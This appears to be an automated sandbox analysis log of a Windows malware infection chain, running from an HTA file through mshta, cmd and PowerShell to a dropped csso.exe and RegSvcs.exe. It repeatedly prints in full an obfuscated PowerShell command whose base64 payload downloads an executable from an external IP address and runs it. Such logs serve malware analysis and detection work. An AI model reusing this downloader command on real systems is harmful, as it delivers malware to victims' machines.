Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D137E8	13_2_01D137E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D12F46	13_2_01D12F46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D12F48	13_2_01D12F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1AF78	13_2_01D1AF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1AF68	13_2_01D1AF68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1A6C1	13_2_01D1A6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1A6C8	13_2_01D1A6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1D690	13_2_01D1D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1D681	13_2_01D1D681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D19E16	13_2_01D19E16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D19E18	13_2_01D19E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1F630	13_2_01D1F630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D1F620	13_2_01D1F620

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: String function: 00080AE3 appears 70 times
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: String function: 00067DE1 appears 35 times
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: String function: 00088900 appears 42 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 12.2.csso.exe.3cb0000.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.csso.exe.3cb0000.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000B81CB AdjustTokenPrivileges,CloseHandle,		12_2_000B81CB
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		12_2_000B87E1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2704:120:WilError_03

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\efs.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1ED.tmp" "c:\Users\user\AppData\Local\Temp\lphx2jer\CSC5DB36CC8F4B54EA59350C64E5EA82CD5.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe"
Source: C:\Users\user\AppData\Roaming\csso.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1ED.tmp" "c:\Users\user\AppData\Local\Temp\lphx2jer\CSC5DB36CC8F4B54EA59350C64E5EA82CD5.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: windows.storage.dll	Jump to behavior
